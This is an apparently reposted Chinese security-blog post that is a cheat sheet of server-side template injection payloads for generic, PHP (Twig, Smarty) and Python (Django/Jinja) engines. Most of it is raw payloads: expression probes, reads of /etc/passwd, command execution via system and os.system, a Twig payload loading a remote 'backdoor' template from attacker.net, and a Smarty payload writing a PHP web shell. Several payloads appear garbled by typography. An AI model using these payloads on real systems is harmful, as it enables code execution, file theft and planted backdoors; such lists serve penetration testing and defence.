SSTI常用payload

admin 2026-01-14 23:54:03 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文档整理了服务器端模板注入SSTI的常用测试Payload,覆盖通用、PHP及Python环境。包含检测语法如数学运算表达式和对象调试,以及读取文件或执行命令的攻击代码片段。该列表适合渗透测试人员快速参考以验证漏洞存在性并获取初步访问权限。 综合评分: 60 文章分类: 渗透测试,WEB安全,漏洞POC


cover_image

SSTI常用payload

原创

01iver Sec

01iver的安全小圈

2026年1月13日 17:00 北京

通用

${{<%[%'”}}%.

{% debug %}

{7*7}

{{ ‘7’*7 }}

{2*2}[[7*7]]

<%= 7 \* 7 %>

{3*3}

{ 3 * 3 }

[[3*3]]

${2*2}

@(3*3)

${= 3*3}

{{= 7*7}}

${{7*7}}

{7*7}

[=7*7]

{{ request }}

{{self}}

{{dump(app)}}

{{ [] .class.base.subclassesO }}

{{”.class.mro()[l] .subclassesO}}

for c in [1,2,3] %}{{ c,c,c }}{% endfor %}

{{ []._class.base.subclasses_O }}

{{[‘cat%20/etc/passwd’]|filter(‘system’)}}

PHP

{php}print “Hello”{/php}

{php}$s = file_get_contents(‘/etc/passwd’,NULL, NULL, 0, 100); var_dump($s);{/php}

{{dump(app)}}

{{app.request.server.all|join(‘,’)}}

“{{‘/etc/passwd’|file_excerpt(1,30)}}”@

{{_self.env.setCache(“ftp://attacker.net:2121”)}}{{_self.env.loadTemplate(“backdoor”)}}

{$smarty.version}

{php}echo id;{/php}

{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,”<?php passthru($_GET['cmd']); ?>“,self::clearConfig())}

Python

{% debug %}

{{settings.SECRET_KEY}}

{% import foobar %} = Error

{% import os %}{{os.system(‘whoami’)}}


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:01iver的安全小圈 01iver Sec《SSTI常用payload》

SSTI常用payload 网络安全文章

SSTI常用payload

文章总结: 文档整理了服务器端模板注入SSTI的常用测试Payload,覆盖通用、PHP及Python环境。包含检测语法如数学运算表达式和对象调试,以及读取文件
评论:0   参与:  0